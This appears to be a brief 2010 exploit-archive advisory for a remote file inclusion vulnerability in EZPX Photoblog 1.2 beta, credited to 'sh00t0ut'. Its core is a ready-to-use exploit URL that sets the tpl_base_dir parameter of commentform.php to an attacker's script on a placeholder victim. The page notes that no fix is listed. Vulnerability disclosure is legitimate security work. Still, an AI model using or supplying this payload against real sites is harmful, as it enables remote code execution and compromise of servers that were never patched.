EZPX Photoblog 1.2 beta Remote File Inclusion Vulnerability

2010-06-16 17:02:08

[~] EZPX photoblog 1.2 beta Remote Include Exploit
[~] Vendor Url: http://ezpx.org/
[~] Found by sh00t0ut
[~] Expl: http://[victim]/system/application/views/public/commentform.php?tpl_base_dir=[evil script]

Fixes

No fixes

In order to submit a new fix you need to be registered.